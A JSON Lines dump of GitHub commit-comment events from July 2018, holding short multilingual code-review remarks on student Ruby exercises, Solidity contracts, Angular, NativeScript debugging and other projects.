{"id":"7977388118","type":"CommitCommentEvent","actor":{"login":"rowlandda"},"repo":{"name":"rowlandda/planets"},"payload":{"comment":{"id":29736439,"position":null,"line":null,"path":null,"commit_id":"8e4bfcc3925cc353190834fab86a68987e7604d8","created_at":"2018-07-17T15:11:38Z","updated_at":"2018-07-17T15:11:38Z","author_association":"OWNER","body":"This is a dummy binary made with `head --bytes 1024 /dev/urandom`"}},"created_at":"2018-07-17T15:11:38Z"}
{"id":"7977389621","type":"CommitCommentEvent","actor":{"login":"digodk"},"repo":{"name":"BitsPleaseBr/bits-please"},"payload":{"comment":{"id":29736445,"position":null,"line":null,"path":null,"commit_id":"8409a2f3f62915293313f99ae630b65f9766014b","created_at":"2018-07-17T15:11:52Z","updated_at":"2018-07-17T15:11:52Z","author_association":"COLLABORATOR","body":"Eu vou deixando os comentários nas linhas do código"}},"created_at":"2018-07-17T15:11:52Z"}
{"id":"7977394571","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29736464,"position":32,"line":32,"path":"Lession1/3.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T15:12:37Z","updated_at":"2018-07-17T15:12:37Z","author_association":"NONE","body":"в ТЗ: \"Также, если треугольник является при этом равнобедренным\"\r\nобрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный, а у тебя она проверяется в любом случае - это нарушение ТЗ, надо исправлять (и для прямоугольного треугольника проверка сильно упростится)"}},"created_at":"2018-07-17T15:12:37Z"}
{"id":"7977394608","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29736465,"position":null,"line":null,"path":null,"commit_id":"318db05cc98db041796ace70ddfce72b75429ee3","created_at":"2018-07-17T15:12:37Z","updated_at":"2018-07-17T15:12:37Z","author_association":"OWNER","body":"Yes, the info won't be publicly accessible except in randbats. `inputLog` is also only filled out at end of battle, so it can't be used to grab the foe's team or decisions during the battle."}},"created_at":"2018-07-17T15:12:37Z"}
{"id":"7977395137","type":"CommitCommentEvent","actor":{"login":"digodk"},"repo":{"name":"BitsPleaseBr/bits-please"},"payload":{"comment":{"id":29736468,"position":60,"line":60,"path":"src/control/bean/Bean.java","commit_id":"8409a2f3f62915293313f99ae630b65f9766014b","created_at":"2018-07-17T15:12:42Z","updated_at":"2018-07-17T15:12:42Z","author_association":"COLLABORATOR","body":"Esse método tá comentado, mas eu não entendi muito bem o objetivo dele"}},"created_at":"2018-07-17T15:12:42Z"}
{"id":"7977395728","type":"CommitCommentEvent","actor":{"login":"briri"},"repo":{"name":"DMPRoadmap/roadmap"},"payload":{"comment":{"id":29736469,"position":null,"line":null,"path":null,"commit_id":"8e719eca9261762b458027841696c3e55c6eb138","created_at":"2018-07-17T15:12:47Z","updated_at":"2018-07-17T15:12:47Z","author_association":"CONTRIBUTOR","body":"Ah yes, that would do it!"}},"created_at":"2018-07-17T15:12:47Z"}
{"id":"7977398410","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29736478,"position":null,"line":null,"path":null,"commit_id":"318db05cc98db041796ace70ddfce72b75429ee3","created_at":"2018-07-17T15:13:11Z","updated_at":"2018-07-17T15:13:11Z","author_association":"OWNER","body":"Also, if anyone was wondering what brought down the replay server a few weeks ago, it was the server-side change for this."}},"created_at":"2018-07-17T15:13:11Z"}
{"id":"7977401687","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29736492,"position":33,"line":33,"path":"Lession1/4.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T15:13:40Z","updated_at":"2018-07-17T15:13:40Z","author_association":"NONE","body":"можно посчитать квадратный корень один раз, присвоить его значение переменной и далее использовать эту переменную, вместо того чтобы считать каждый раз"}},"created_at":"2018-07-17T15:13:40Z"}
{"id":"7977403624","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29736495,"position":82,"line":64,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T15:13:58Z","updated_at":"2018-07-17T15:13:58Z","author_association":"OWNER","body":"I am a bit confused when it comes to decide if a variable should be declared storage or memory. In this case, for example, you suggest that I use `Payment storage payment = payments[paymentID];` to improve readability. However, I don't understand why we should declare it as storage. Won't we be adding to the storage a variable that duplicates content already existent in the contract (hence overkill)?  And this will happen every time we call the function. \r\nI would like to get this clarified please. "}},"created_at":"2018-07-17T15:13:58Z"}
{"id":"7977404917","type":"CommitCommentEvent","actor":{"login":"digodk"},"repo":{"name":"BitsPleaseBr/bits-please"},"payload":{"comment":{"id":29736499,"position":14,"line":14,"path":"src/control/bean/Bean.java","commit_id":"8409a2f3f62915293313f99ae630b65f9766014b","created_at":"2018-07-17T15:14:11Z","updated_at":"2018-07-17T15:14:11Z","author_association":"COLLABORATOR","body":"Acho que poderia deixar uma propriedade já fixa para todos os Beans, que é o `ID`.\r\nNa real esquece, preciso pensar melhor nessa ideia"}},"created_at":"2018-07-17T15:14:11Z"}
{"id":"7977407660","type":"CommitCommentEvent","actor":{"login":"saladjay"},"repo":{"name":"PanPanCN/PanPanMvvm.Toolkit"},"payload":{"comment":{"id":29736505,"position":null,"line":null,"path":null,"commit_id":"a15f365fc12fe773fb6d93d0968ba3b936bd6eea","created_at":"2018-07-17T15:14:33Z","updated_at":"2018-07-17T15:14:33Z","author_association":"NONE","body":"你好，我同样也是一个wpf的学习者，对你的写的MVVM.toolkit很感兴趣。想请教一下ObservableObject和RelayEventCommand设计目的。这两个类有没有相关的参考资料。谢谢。"}},"created_at":"2018-07-17T15:14:33Z"}
{"id":"7977408435","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29736509,"position":30,"line":30,"path":"Lession1/3.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T15:14:41Z","updated_at":"2018-07-17T15:14:41Z","author_association":"NONE","body":"здесь и далее:\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```ruby\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```"}},"created_at":"2018-07-17T15:14:41Z"}
{"id":"7977411331","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"JerikoQ/RoR"},"payload":{"comment":{"id":29736517,"position":30,"line":30,"path":"Lession1/3.rb","commit_id":"7735fe369b63583167a2691d37b5e2972a560462","created_at":"2018-07-17T15:15:07Z","updated_at":"2018-07-17T15:15:07Z","author_association":"NONE","body":"при этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```ruby\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-17T15:15:07Z"}
{"id":"7977414825","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29736530,"position":null,"line":null,"path":null,"commit_id":"54e4a1deb942bf1d48680ba4424cdd49ad61a231","created_at":"2018-07-17T15:15:36Z","updated_at":"2018-07-17T15:15:36Z","author_association":"NONE","body":"I recommend you try keeping the ``~attacksByPawns``. I think this is crucial for the term."}},"created_at":"2018-07-17T15:15:36Z"}
{"id":"7977416315","type":"CommitCommentEvent","actor":{"login":"lionel-"},"repo":{"name":"tidyverse/ggplot2"},"payload":{"comment":{"id":29736535,"position":null,"line":null,"path":null,"commit_id":"3fc9309a757a67517c262151dfb13363214f1112","created_at":"2018-07-17T15:15:50Z","updated_at":"2018-07-17T15:15:50Z","author_association":"MEMBER","body":"`%in%` is vectorised and `all()` is needed here."}},"created_at":"2018-07-17T15:15:50Z"}
{"id":"7977417999","type":"CommitCommentEvent","actor":{"login":"luqmansen"},"repo":{"name":"luqmansen/helofrens"},"payload":{"comment":{"id":29736544,"position":4,"line":5,"path":"index.html","commit_id":"24e88b517b2dafc3c560ba01e432181a5c77e4ac","created_at":"2018-07-17T15:16:07Z","updated_at":"2018-07-17T15:16:07Z","author_association":"OWNER","body":"good boye"}},"created_at":"2018-07-17T15:16:07Z"}
{"id":"7977420378","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29736550,"position":null,"line":null,"path":null,"commit_id":"212f3944c06c735ac4dd307d6c1d585043994b35","created_at":"2018-07-17T15:16:28Z","updated_at":"2018-07-17T15:16:28Z","author_association":"CONTRIBUTOR","body":"Thanks for the review.  \r\n\r\n@mchien20 \r\n1. can you please elaborate on \" See dots on pages 164-165.\"  That's quite cryptic.\r\n2. Can the redundancy be removed?  \"+XX Should eval be set to false in this chunk since it repeats the loading from earlier\"\r\n3. There's no need to mention the \"cache=TRUE\" chunk option.\r\n4. I'm fine with the upper and lower triangles of the correlation matrix.\r\n"}},"created_at":"2018-07-17T15:16:28Z"}
{"id":"7977421384","type":"CommitCommentEvent","actor":{"login":"LydiaFritz"},"repo":{"name":"LydiaFritz/CST105"},"payload":{"comment":{"id":29736554,"position":null,"line":null,"path":null,"commit_id":"4c2eeb1c69ffdd5b3527e1c75a638f7f3cb338d1","created_at":"2018-07-17T15:16:37Z","updated_at":"2018-07-17T15:16:37Z","author_association":"OWNER","body":"Exercise 2"}},"created_at":"2018-07-17T15:16:37Z"}
{"id":"7977424135","type":"CommitCommentEvent","actor":{"login":"ND1979"},"repo":{"name":"ND1979/skip_center_python_course"},"payload":{"comment":{"id":29736555,"position":null,"line":null,"path":null,"commit_id":"bd520a3f7c6e06cfa1bdf569c8bbfcf787be8ad0","created_at":"2018-07-17T15:17:04Z","updated_at":"2018-07-17T15:17:04Z","author_association":"OWNER","body":"Logical mistake have been found..."}},"created_at":"2018-07-17T15:17:04Z"}
{"id":"7977427154","type":"CommitCommentEvent","actor":{"login":"lenkis"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":29736567,"position":27,"line":105,"path":"doc/1.7/intro.rst","commit_id":"6d3f557ea33aaea56ac26fca36af51e62279867d","created_at":"2018-07-17T15:17:32Z","updated_at":"2018-07-17T15:17:32Z","author_association":"COLLABORATOR","body":"Wrong spelling for \"algorythm\": https://www.spellchecker.net/algorithm"}},"created_at":"2018-07-17T15:17:32Z"}
{"id":"7977436251","type":"CommitCommentEvent","actor":{"login":"kelvinau"},"repo":{"name":"AshMenhennett/Forum"},"payload":{"comment":{"id":29736597,"position":null,"line":null,"path":null,"commit_id":"32f8b1604be420e484488fd7ad0890a2a3837624","created_at":"2018-07-17T15:18:57Z","updated_at":"2018-07-17T15:18:57Z","author_association":"NONE","body":"Well there are still about 80% of websites that use PHP still using version 5. This fix is just a small change to the code anyways. Otherwise I think we should explicitly mention in README that this project only supports PHP 7."}},"created_at":"2018-07-17T15:18:57Z"}
{"id":"7977446285","type":"CommitCommentEvent","actor":{"login":"BoTranVan"},"repo":{"name":"hocchudong/thuctap012017"},"payload":{"comment":{"id":29736632,"position":null,"line":null,"path":null,"commit_id":"8b9d575bf9ca4aea517d1c51d8b75b53ae783c4e","created_at":"2018-07-17T15:20:31Z","updated_at":"2018-07-17T15:20:31Z","author_association":"CONTRIBUTOR","body":"interface LAN là làm giống với khi cài đặt"}},"created_at":"2018-07-17T15:20:31Z"}
{"id":"7977448586","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736649,"position":6,"line":6,"path":"Lesson_1/ideal_weight.rb","commit_id":"2a50592ef86154dfb95914bed8f0fa1f177968a1","created_at":"2018-07-17T15:20:51Z","updated_at":"2018-07-17T15:20:51Z","author_association":"NONE","body":"лучше не усложнять названия ненужными префиксами\r\nв данном случае он скорее не нужен и `name` было бы достаточно"}},"created_at":"2018-07-17T15:20:51Z"}
{"id":"7977448915","type":"CommitCommentEvent","actor":{"login":"CurtisBelt"},"repo":{"name":"stevenwanderski/bxslider-4"},"payload":{"comment":{"id":29736650,"position":3,"line":2,"path":"src/js/jquery.bxslider.js","commit_id":"6380794bcdc9a15f6fe8078463267e34bf39e5aa","created_at":"2018-07-17T15:20:54Z","updated_at":"2018-07-17T15:20:54Z","author_association":"NONE","body":"@sekmenhuseyin Typo? \"4.2.1d\""}},"created_at":"2018-07-17T15:20:54Z"}
{"id":"7977448958","type":"CommitCommentEvent","actor":{"login":"dreua"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29736652,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-17T15:20:55Z","updated_at":"2018-07-17T15:20:55Z","author_association":"CONTRIBUTOR","body":"My pleasure, thank YOU for starting and maintaining all this!\r\n\r\nI just had the inspiration for another Google query and found this: [binutils: .ident spam in executables #21](https://github.com/Alexpux/MINGW-packages/issues/21)\r\nTL;DR: Problem is known since 2014 but no one seems to really care. I think I will do the same now."}},"created_at":"2018-07-17T15:20:55Z"}
{"id":"7977450021","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736655,"position":6,"line":6,"path":"Lesson_1/ideal_weight.rb","commit_id":"2a50592ef86154dfb95914bed8f0fa1f177968a1","created_at":"2018-07-17T15:21:05Z","updated_at":"2018-07-17T15:21:05Z","author_association":"NONE","body":"аналогично по остальным переменным"}},"created_at":"2018-07-17T15:21:05Z"}
{"id":"7977455235","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736662,"position":7,"line":7,"path":"Lesson_1/ideal_weight.rb","commit_id":"2a50592ef86154dfb95914bed8f0fa1f177968a1","created_at":"2018-07-17T15:21:53Z","updated_at":"2018-07-17T15:21:53Z","author_association":"NONE","body":"проще дописать `capitalize` (без бенга) в 6 строке"}},"created_at":"2018-07-17T15:21:53Z"}
{"id":"7977456344","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29736664,"position":181,"line":181,"path":"aio/src/app/shared/scroll-spy.service.ts","commit_id":"c8b08f3a597d08ba71220a6b3e0c64d4ce6ed175","created_at":"2018-07-17T15:22:04Z","updated_at":"2018-07-17T15:22:04Z","author_association":"MEMBER","body":"> Checked for 1600x900 and 1920x1080\r\n\r\nOh, I thought it didn't work on angular.io. If it's your own project, then what @petebacondarwin said :grin:\r\n<sub>(But if `window.innerHeight` works for you, feel free to use that in your project.)</sub>"}},"created_at":"2018-07-17T15:22:04Z"}
{"id":"7977460540","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736674,"position":6,"line":6,"path":"Lesson_1/area_of_triangles.rb","commit_id":"0aef2802d31586698d21ee592c9226185b5029ba","created_at":"2018-07-17T15:22:44Z","updated_at":"2018-07-17T15:22:44Z","author_association":"NONE","body":"здесь и далее везде:\r\nрекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данную переменную можно было бы назвать `base`"}},"created_at":"2018-07-17T15:22:44Z"}
{"id":"7977461646","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736676,"position":6,"line":6,"path":"Lesson_1/area_of_triangles.rb","commit_id":"0aef2802d31586698d21ee592c9226185b5029ba","created_at":"2018-07-17T15:22:54Z","updated_at":"2018-07-17T15:22:54Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти навзвания диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-17T15:22:54Z"}
{"id":"7977461809","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29736677,"position":58,"line":256,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T15:22:56Z","updated_at":"2018-07-17T15:22:56Z","author_association":"OWNER","body":"You should iterate through `n->f` and add each function to the queue of functions to compile along with their name and ya, the identical function will get compiled twice."}},"created_at":"2018-07-17T15:22:56Z"}
{"id":"7977464796","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29736681,"position":73,"line":265,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T15:23:24Z","updated_at":"2018-07-17T15:23:24Z","author_association":"OWNER","body":"Iterate through them first and add them to the queue as its initial value, then go through the queue in the normal way"}},"created_at":"2018-07-17T15:23:24Z"}
{"id":"7977466220","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736682,"position":11,"line":11,"path":"Lesson_1/area_of_triangles.rb","commit_id":"0aef2802d31586698d21ee592c9226185b5029ba","created_at":"2018-07-17T15:23:38Z","updated_at":"2018-07-17T15:23:38Z","author_association":"NONE","body":"здесь и далее:\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```ruby\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```"}},"created_at":"2018-07-17T15:23:38Z"}
{"id":"7977468189","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736684,"position":14,"line":14,"path":"Lesson_1/area_of_triangles.rb","commit_id":"0aef2802d31586698d21ee592c9226185b5029ba","created_at":"2018-07-17T15:23:57Z","updated_at":"2018-07-17T15:23:57Z","author_association":"NONE","body":"здесь и далее везде:\r\nнайди для своего редактора автодобавление пустой строки в конце файла, чтобы не было красной стрелки на ГитХабе и вручную не приходилось добавлять строки в каждом файле"}},"created_at":"2018-07-17T15:23:57Z"}
{"id":"7977468621","type":"CommitCommentEvent","actor":{"login":"davidherasp"},"repo":{"name":"MADLionsEC/lol-data-solution"},"payload":{"comment":{"id":29736685,"position":null,"line":null,"path":null,"commit_id":"1a83af6af7275f5074030438df52a43cb8c4c7ea","created_at":"2018-07-17T15:24:01Z","updated_at":"2018-07-17T15:24:01Z","author_association":"COLLABORATOR","body":"The description of the commit is not correct. The commit is actually about the first implementation of the SQL to MongoDB changes."}},"created_at":"2018-07-17T15:24:01Z"}
{"id":"7977469703","type":"CommitCommentEvent","actor":{"login":"sis0k0"},"repo":{"name":"NativeScript/nativescript-dev-webpack"},"payload":{"comment":{"id":29736689,"position":null,"line":null,"path":null,"commit_id":"a68778e7c576e0ec75b73beedfaa2fee08a97511","created_at":"2018-07-17T15:24:12Z","updated_at":"2018-07-17T15:24:12Z","author_association":"COLLABORATOR","body":"Hey @farfromrefug, we'll publish a blog post soon and update the docs with instructions for debugging with webpack. In short, you can use:\r\n```\r\ntns debug android --bundle --env.sourceMap\r\n```\r\nand attach to the debugger either with Chrome Devtools and the link in the console output, or with VS Code by adding a {N} `attach to android` configuration."}},"created_at":"2018-07-17T15:24:12Z"}
{"id":"7977470870","type":"CommitCommentEvent","actor":{"login":"HarelM"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":29736693,"position":null,"line":null,"path":null,"commit_id":"f04d9e20b5d57b93c77acf8a962313694210259b","created_at":"2018-07-17T15:24:22Z","updated_at":"2018-07-17T15:24:22Z","author_association":"MEMBER","body":"Where does this file needs to be when deploying it to the server?\r\nI'm guessing this needs to be configured in angular.json or something otherwise it won't get packed..."}},"created_at":"2018-07-17T15:24:22Z"}
{"id":"7977471362","type":"CommitCommentEvent","actor":{"login":"davidherasp"},"repo":{"name":"MADLionsEC/lol-data-solution"},"payload":{"comment":{"id":29736694,"position":null,"line":null,"path":null,"commit_id":"1a83af6af7275f5074030438df52a43cb8c4c7ea","created_at":"2018-07-17T15:24:27Z","updated_at":"2018-07-17T15:24:27Z","author_association":"COLLABORATOR","body":"And it refers to the issue #15 "}},"created_at":"2018-07-17T15:24:27Z"}
{"id":"7977474138","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736700,"position":11,"line":11,"path":"Lesson_1/area_of_triangles.rb","commit_id":"0aef2802d31586698d21ee592c9226185b5029ba","created_at":"2018-07-17T15:24:51Z","updated_at":"2018-07-17T15:24:51Z","author_association":"NONE","body":"наверное правильней назвать переменную в единственном числе `area_of_triangle`, а можно даже не усложнять и просто `area`"}},"created_at":"2018-07-17T15:24:51Z"}
{"id":"7977475563","type":"CommitCommentEvent","actor":{"login":"SP-Blanco"},"repo":{"name":"SP-Blanco/Lazarus-pit2"},"payload":{"comment":{"id":29736702,"position":null,"line":null,"path":null,"commit_id":"fcf7e12d08efd3eaf54d63dadfc099c218baf43f","created_at":"2018-07-17T15:25:05Z","updated_at":"2018-07-17T15:25:05Z","author_association":"OWNER","body":"Let's get started!! "}},"created_at":"2018-07-17T15:25:05Z"}
{"id":"7977479204","type":"CommitCommentEvent","actor":{"login":"steadfasterX"},"repo":{"name":"Carbon-Fusion/fwul_welcome"},"payload":{"comment":{"id":29736712,"position":null,"line":null,"path":null,"commit_id":"7424be20d2b77ed2b33566f64256a772925ab0cd","created_at":"2018-07-17T15:25:38Z","updated_at":"2018-07-17T15:25:38Z","author_association":"MEMBER","body":"fixes https://github.com/Carbon-Fusion/build_fwul/issues/76"}},"created_at":"2018-07-17T15:25:38Z"}
{"id":"7977480028","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29736715,"position":79,"line":79,"path":"testing/phabricator/APKBUILD","commit_id":"011483f5726a8239ff857ee2061a4595d9f54a63","created_at":"2018-07-17T15:25:46Z","updated_at":"2018-07-17T15:25:46Z","author_association":"MEMBER","body":"This is totally unnecessary, you can just fetch tarball for exact commit from GitHub, e.g.: https://github.com/phacility/phabricator/archive/cc69bed52fb9ed8beef136f7dfef555a1e91331f.tar.gz."}},"created_at":"2018-07-17T15:25:46Z"}
{"id":"7977480569","type":"CommitCommentEvent","actor":{"login":"BoTranVan"},"repo":{"name":"hocchudong/thuctap012017"},"payload":{"comment":{"id":29736716,"position":null,"line":null,"path":null,"commit_id":"8b9d575bf9ca4aea517d1c51d8b75b53ae783c4e","created_at":"2018-07-17T15:25:51Z","updated_at":"2018-07-17T15:25:51Z","author_association":"CONTRIBUTOR","body":"cấu hình giống với lúc cài đặt pfsense thôi mà cậu. Mình hiện tại không có điều kiện để viết tuts.. Mong cậu thông cảm."}},"created_at":"2018-07-17T15:25:51Z"}
{"id":"7977481764","type":"CommitCommentEvent","actor":{"login":"wavedashdoc"},"repo":{"name":"elektroschmock/android_device_moto_shamu"},"payload":{"comment":{"id":29736719,"position":null,"line":null,"path":null,"commit_id":"daf02e426dfeb632294daa66b9a9a3ac995983f0","created_at":"2018-07-17T15:26:02Z","updated_at":"2018-07-17T15:26:02Z","author_association":"NONE","body":"May I suggest a few changes based of my testing? \r\n\r\nhispeed_freq: 172800\r\ntarget_loads: 30 800000:35 1500000:65 1900000:75 2200000:98\r\nmin_sample_time: 30000\r\nTimer_slack: 5000\r\nTime_rate: 30000"}},"created_at":"2018-07-17T15:26:02Z"}
{"id":"7977482814","type":"CommitCommentEvent","actor":{"login":"adlakhamehak98"},"repo":{"name":"ruchipareek5/ttn-intern-assignment"},"payload":{"comment":{"id":29736721,"position":null,"line":null,"path":null,"commit_id":"eb7aed3d961f249e422ba1665fe79d0fc0973388","created_at":"2018-07-17T15:26:12Z","updated_at":"2018-07-17T15:26:12Z","author_association":"COLLABORATOR","body":"17/07/18"}},"created_at":"2018-07-17T15:26:12Z"}
{"id":"7977483150","type":"CommitCommentEvent","actor":{"login":"Setnea"},"repo":{"name":"dizak/mothulity"},"payload":{"comment":{"id":29736722,"position":null,"line":null,"path":null,"commit_id":"90474e6710b3cb9034ea1e20fc3c4b9fff813d72","created_at":"2018-07-17T15:26:15Z","updated_at":"2018-07-17T15:26:15Z","author_association":"COLLABORATOR","body":"#36 "}},"created_at":"2018-07-17T15:26:15Z"}
{"id":"7977483166","type":"CommitCommentEvent","actor":{"login":"YannickDieter"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29736723,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T15:26:15Z","updated_at":"2018-07-17T15:26:15Z","author_association":"COLLABORATOR","body":"Okay, so you 'solved' the case of truncated data with expanding the hit buffer, right?"}},"created_at":"2018-07-17T15:26:15Z"}
{"id":"7977502889","type":"CommitCommentEvent","actor":{"login":"hanchang"},"repo":{"name":"coinfi/coinfi"},"payload":{"comment":{"id":29736767,"position":4,"line":4,"path":"db/migrate/20180715114637_create_calendar_events.rb","commit_id":"81285c9872a3df634ec53841aba0f8a99d7b7362","created_at":"2018-07-17T15:29:18Z","updated_at":"2018-07-17T15:29:18Z","author_association":"COLLABORATOR","body":"Hm, my understanding is that an event can potentially have multiple coins associated with it, so we'll likely need a join table for that as well."}},"created_at":"2018-07-17T15:29:18Z"}
{"id":"7977505072","type":"CommitCommentEvent","actor":{"login":"eddytion"},"repo":{"name":"eddytion/scripts"},"payload":{"comment":{"id":29736771,"position":null,"line":null,"path":null,"commit_id":"dee33b939d64c036d0c2354d4f9480e4c1f3ec76","created_at":"2018-07-17T15:29:38Z","updated_at":"2018-07-17T15:29:38Z","author_association":"OWNER","body":"Hey, you're welcome :) !"}},"created_at":"2018-07-17T15:29:38Z"}
{"id":"7977506007","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29736772,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T15:29:48Z","updated_at":"2018-07-17T15:29:48Z","author_association":"OWNER","body":"The only thing I can think is replacing exchange by hashedPasswordExchange. But then Alice needs to be sure that only the exchange has access to the password. It seems more risky..."}},"created_at":"2018-07-17T15:29:48Z"}
{"id":"7977506834","type":"CommitCommentEvent","actor":{"login":"hanchang"},"repo":{"name":"coinfi/coinfi"},"payload":{"comment":{"id":29736776,"position":5,"line":5,"path":"db/migrate/20180715114637_create_calendar_events.rb","commit_id":"81285c9872a3df634ec53841aba0f8a99d7b7362","created_at":"2018-07-17T15:29:55Z","updated_at":"2018-07-17T15:29:55Z","author_association":"COLLABORATOR","body":"I'm not 100% sure which user this would refer to - the user that created the event?"}},"created_at":"2018-07-17T15:29:55Z"}
{"id":"7977509195","type":"CommitCommentEvent","actor":{"login":"jcollins-g"},"repo":{"name":"dart-lang/rpc"},"payload":{"comment":{"id":29736785,"position":4,"line":52,"path":"bin/generate.dart","commit_id":"dc8dc4cbfd180d75c8303f9187483b0849626d1e","created_at":"2018-07-17T15:30:18Z","updated_at":"2018-07-17T15:30:18Z","author_association":"NONE","body":"yep.  I need to sweep back through this and clean up -- I'm currently in the hack everything with a machete until i get a steel-thread through mode :-)"}},"created_at":"2018-07-17T15:30:18Z"}
{"id":"7977510076","type":"CommitCommentEvent","actor":{"login":"hanchang"},"repo":{"name":"coinfi/coinfi"},"payload":{"comment":{"id":29736788,"position":10,"line":10,"path":"db/migrate/20180715114637_create_calendar_events.rb","commit_id":"81285c9872a3df634ec53841aba0f8a99d7b7362","created_at":"2018-07-17T15:30:25Z","updated_at":"2018-07-17T15:30:25Z","author_association":"COLLABORATOR","body":"Probably need two sources, one for the URL and another for a screenshot or something along those lines?"}},"created_at":"2018-07-17T15:30:25Z"}
{"id":"7977513830","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736794,"position":29,"line":29,"path":"Lesson_1/right_triangle.rb","commit_id":"07c8fa7aff8e3878795deaa5f56208d0bfedcb4f","created_at":"2018-07-17T15:31:00Z","updated_at":"2018-07-17T15:31:00Z","author_association":"NONE","body":"еще.... \r\nможешь оставить как есть, но можно сделать следующим образом\r\nне заводить отдельные переменные, а работать со значениями, ссылаясь на них по индексу в массиве:\r\n```ruby\r\nsides[2]**2 = sides[0]**2 + sides[1]**2\r\n```\r\nну и далее тоже обращаться к массиву"}},"created_at":"2018-07-17T15:31:00Z"}
